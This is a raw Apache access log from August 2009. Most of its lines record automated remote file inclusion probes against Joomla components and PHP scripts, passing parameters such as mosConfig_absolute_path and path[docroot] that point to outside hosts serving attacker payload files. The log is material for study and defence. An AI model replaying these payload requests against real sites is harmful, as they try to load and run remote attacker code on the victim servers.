67.218.116.132 - - [12/Aug/2009:00:00:22 -0400] "GET /logs/access_log.Q108120400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
202.191.43.177 - - [12/Aug/2009:00:00:33 -0400] "GET /logs/access_log.Q109052200/?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
202.191.43.177 - - [12/Aug/2009:00:00:33 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
202.191.43.177 - - [12/Aug/2009:00:00:34 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 200 13344 "-" "libwww-perl/5.805"
200.93.147.154 - - [12/Aug/2009:00:00:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/arif121/kuro.txt??? HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.93.147.154 - - [12/Aug/2009:00:01:00 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/arif121/kuro.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.59.12.99 - - [12/Aug/2009:00:01:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [12/Aug/2009:00:01:54 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/planet121/new.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
119.63.193.55 - - [12/Aug/2009:00:01:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
195.155.232.36 - - [12/Aug/2009:00:03:25 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:03:25 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:03:25 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:04:10 -0400] "GET /logs//atom.php5?page=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:04:10 -0400] "GET //atom.php5?page=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:04:10 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:04:19 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:04:23 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:04:23 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:04:23 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:00:04:52 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:05:04 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:05:38 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:05:38 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:05:38 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:05:38 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.191.43.177 - - [12/Aug/2009:00:05:54 -0400] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
200.93.147.154 - - [12/Aug/2009:00:06:13 -0400] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/arif121/kuro.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
213.149.105.8 - - [12/Aug/2009:00:06:55 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:06:55 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:06:55 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Aug/2009:00:07:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [12/Aug/2009:00:07:19 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
211.15.55.45 - - [12/Aug/2009:00:07:42 -0400] "GET /logs/access_log.Q109062000/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
211.15.55.45 - - [12/Aug/2009:00:07:44 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
211.15.55.45 - - [12/Aug/2009:00:07:45 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
211.15.55.45 - - [12/Aug/2009:00:08:22 -0400] "GET /logs/error_log.Q109062000/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.30.81.182 - - [12/Aug/2009:00:08:25 -0400] "GET /images/_notes/nav_store_cart_blue.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.116.209 - - [12/Aug/2009:00:09:05 -0400] "GET //?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:09:06 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:09:06 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:09:38 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [12/Aug/2009:00:10:04 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [12/Aug/2009:00:10:05 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.93.147.154 - - [12/Aug/2009:00:10:05 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.78.116.209 - - [12/Aug/2009:00:10:19 -0400] "GET //admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:10:19 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:10:19 -0400] "GET /logs//admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [12/Aug/2009:00:10:48 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/planet121/new.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.206.123.139 - - [12/Aug/2009:00:10:51 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:10:51 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:10:53 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:10:57 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:10:57 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:10:59 -0400] "GET //?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.149.105.8 - - [12/Aug/2009:00:11:10 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:11:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:11:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:11:31 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
200.93.147.154 - - [12/Aug/2009:00:11:59 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.93.147.154 - - [12/Aug/2009:00:11:59 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.93.147.154 - - [12/Aug/2009:00:11:59 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.206.123.139 - - [12/Aug/2009:00:12:02 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:00:12:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [12/Aug/2009:00:12:12 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:12:12 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.109.108.146 - - [12/Aug/2009:00:12:14 -0400] "GET /logs/access_log.Q109071200/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
210.109.108.146 - - [12/Aug/2009:00:12:15 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
210.109.108.146 - - [12/Aug/2009:00:12:15 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
210.109.108.146 - - [12/Aug/2009:00:12:16 -0400] "GET /logs/access_log.Q109062000/index.php?_SERVER[DOCUMENT_ROOT]=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.93.147.154 - - [12/Aug/2009:00:12:36 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.202.2.220 - - [12/Aug/2009:00:12:38 -0400] "GET //?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:12:38 -0400] "GET /logs//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:12:38 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:12:41 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:12:41 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:12:41 -0400] "GET //?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:12:41 -0400] "GET /logs//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:12:51 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [12/Aug/2009:00:12:54 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
211.202.2.220 - - [12/Aug/2009:00:12:57 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:13:05 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:10 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.73.39.76 - - [12/Aug/2009:00:13:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.39.76 - - [12/Aug/2009:00:13:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.39.76 - - [12/Aug/2009:00:13:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.39.76 - - [12/Aug/2009:00:13:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.78.116.209 - - [12/Aug/2009:00:13:34 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:34 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:34 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:13:47 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:13:52 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:13:52 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:59 -0400] "GET /logs/access_log.Q109071900%20%20//searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:59 -0400] "GET /logs//searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:13:59 -0400] "GET //searcharrays.php?addonDir=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:13:59 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:13:59 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:13:59 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:14:02 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:14:02 -0400] "GET //?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:14:02 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:14:06 -0400] "GET /logs/access_log.Q109070500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:14:15 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:14:20 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:14:20 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:14:20 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:14:20 -0400] "GET /logs/access_log.Q109080100%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:14:22 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:14:22 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:14:22 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:14:22 -0400] "GET /logs/access_log.Q109070500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:24 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:24 -0400] "GET //?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:27 -0400] "GET //?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:27 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:27 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:14:37 -0400] "GET //?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:14:37 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:14:37 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:38 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:14:41 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:14:42 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:14:42 -0400] "GET /logs/error_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:15:11 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
